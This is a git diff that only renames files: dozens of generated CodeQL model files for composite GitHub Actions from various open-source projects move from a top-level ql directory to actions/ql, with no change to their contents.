diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/nektos_act.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/oracle_graal.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml rename to actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml rename to actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/owntracks_android.model.yml rename to actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml rename to actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml rename to actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/php_php-src.model.yml rename to actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml rename to actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/primer_react.model.yml rename to actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml rename to actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml rename to actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/psf_black.model.yml rename to actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml rename to actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/python_mypy.model.yml rename to actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml rename to actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/quay_clair.model.yml rename to actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml rename to actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/randombit_botan.model.yml rename to actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml rename to actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml rename to actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml rename to actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml rename to actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rook_rook.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/roots_trellis.model.yml rename to actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ruby_debug.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml rename to actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/saltstack_salt.yml rename to actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml 
diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml rename to actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/scitools_iris.model.yml rename to actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml rename to actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml rename to actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml 
